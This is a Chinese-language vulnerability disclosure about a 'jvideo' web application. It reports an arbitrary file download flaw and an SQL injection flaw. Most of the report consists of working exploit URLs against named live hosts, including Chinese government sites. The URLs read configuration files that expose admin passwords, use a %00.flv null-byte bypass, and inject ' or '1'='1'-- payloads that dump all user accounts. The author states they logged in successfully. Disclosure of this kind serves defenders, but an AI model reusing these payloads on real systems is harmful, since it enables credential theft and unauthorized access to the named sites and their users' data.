### 简要描述: 两处。 ### 详细说明: 一个是任意文件下载,一个是sql注入。 先看任意文件下载吧,任意文件下载可以下载到setup的相关安装信息,从而可以登录setup目录的管理后台 http://222.66.10.88:8081/jvideo/down.jsp?pathfile=WEB-INF/web.xml [<img src="https://images.seebug.org/upload/201405/1212340476c3a25a844a21de7d94ba631e4726e1.png" alt="image001.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1212340476c3a25a844a21de7d94ba631e4726e1.png) 来点好东西 http://222.66.10.88:8081/jvideo/down.jsp?pathfile=WEB-INF/ini/merpserver.ini [<img src="https://images.seebug.org/upload/201405/12123526289f086b8d632fd3a3f1c90ce251ef0d.png" alt="image002.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/12123526289f086b8d632fd3a3f1c90ce251ef0d.png) 可以看见setup下Admin的密码(屏蔽了),登录成功 [<img src="https://images.seebug.org/upload/201405/121235439d15b3f504da28ef7f026f02a0c9e78c.png" alt="image003.png" width="600"...
### 简要描述: 两处。 ### 详细说明: 一个是任意文件下载,一个是sql注入。 先看任意文件下载吧,任意文件下载可以下载到setup的相关安装信息,从而可以登录setup目录的管理后台 http://222.66.10.88:8081/jvideo/down.jsp?pathfile=WEB-INF/web.xml [<img src="https://images.seebug.org/upload/201405/1212340476c3a25a844a21de7d94ba631e4726e1.png" alt="image001.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1212340476c3a25a844a21de7d94ba631e4726e1.png) 来点好东西 http://222.66.10.88:8081/jvideo/down.jsp?pathfile=WEB-INF/ini/merpserver.ini [<img src="https://images.seebug.org/upload/201405/12123526289f086b8d632fd3a3f1c90ce251ef0d.png" alt="image002.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/12123526289f086b8d632fd3a3f1c90ce251ef0d.png) 可以看见setup下Admin的密码(屏蔽了),登录成功 [<img src="https://images.seebug.org/upload/201405/121235439d15b3f504da28ef7f026f02a0c9e78c.png" alt="image003.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/121235439d15b3f504da28ef7f026f02a0c9e78c.png) 另外一个网站 http://www.yzwh.gov.cn/jvideo/down.jsp?pathfile=WEB-INF/ini/merpserver.ini [<img src="https://images.seebug.org/upload/201405/12123607c70e6e9df77ef28c39b823af711a82b8.png" alt="image005.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/12123607c70e6e9df77ef28c39b823af711a82b8.png) 也可以看见setup下的admin的密码,登录成功 [<img src="https://images.seebug.org/upload/201405/12123630e2de9dd86639d54808d90bff0e321b69.png" alt="image006.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/12123630e2de9dd86639d54808d90bff0e321b69.png) 如果遇到某些下载下来是空白的情况,可以试试下面这样: pathfile=/WEB-INF/ini/merpserver.ini%00.flv 可以绕过他们的防下载。 ### 漏洞证明: SQL就简单证明下了 网站1 正常页面: http://www.yzwh.gov.cn/jvideo/objectbox/selectx_userlist.jsp [<img src="https://images.seebug.org/upload/201405/121237187827aee214c29d7412b25151e3c8179e.png" alt="image008.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/121237187827aee214c29d7412b25151e3c8179e.png) 用or测试,回显所有账号信息: http://www.yzwh.gov.cn/jvideo/objectbox/selectx_userlist.jsp?type=&userType=-1&fn_Keywords=%E5%BC%A0%E4%B8%89' or '1'='1'--&perm=&cPage=1&tiao= [<img src="https://images.seebug.org/upload/201405/12123737713362ed0cc4bc511f6fbbf397065ad4.png" alt="image010.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/12123737713362ed0cc4bc511f6fbbf397065ad4.png) 用and: http://www.yzwh.gov.cn/jvideo/objectbox/selectx_userlist.jsp?type=&userType=-1&fn_Keywords=%E5%BC%A0%E4%B8%89' and '1'='1'--&perm=&cPage=1&tiao= [<img src="https://images.seebug.org/upload/201405/1212375147685fbedbd56c99fb75e9ca81bfb620.png" alt="image012.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1212375147685fbedbd56c99fb75e9ca81bfb620.png) http://www.yzwh.gov.cn/jvideo/objectbox/selectx_userlist.jsp?type=&userType=-1&fn_Keywords=%E5%BC%A0%E4%B8%89'--&perm=&cPage=1&tiao= 可以用注释符: [<img src="https://images.seebug.org/upload/201405/12123806ad15dced49bf9003b7393ba05632e0cb.png" alt="image013.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/12123806ad15dced49bf9003b7393ba05632e0cb.png) 网站2 正常页面: http://www.jinxiang.gov.cn/jvideo/objectbox/selectx_userlist.jsp [<img src="https://images.seebug.org/upload/201405/12123824440aa0179a20a48d2af7745c8667caa4.png" alt="image015.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/12123824440aa0179a20a48d2af7745c8667caa4.png) 用and测试,木有问题正常回显搜索的账号: http://www.jinxiang.gov.cn/jvideo/objectbox/selectx_userlist.jsp?type=&userType=-1&fn_Keywords=zzz' and '1'='1'--&perm=&cPage=1&tiao= [<img src="https://images.seebug.org/upload/201405/12123842f580c15d5d11421d76d5b85ec9394e9a.png" alt="image017.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/12123842f580c15d5d11421d76d5b85ec9394e9a.png) 用or来测试,回显全部账号信息: http://www.jinxiang.gov.cn/jvideo/objectbox/selectx_userlist.jsp?type=&userType=-1&fn_Keywords=zzz' or '1'='1'--&perm=&cPage=1&tiao= [<img src="https://images.seebug.org/upload/201405/12123858cf91b524a5bb23d9929cc6f876e01b96.png" alt="image019.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/12123858cf91b524a5bb23d9929cc6f876e01b96.png) 由于网络有问题经常访问网站都是504,所以就不再用工具详细测试了。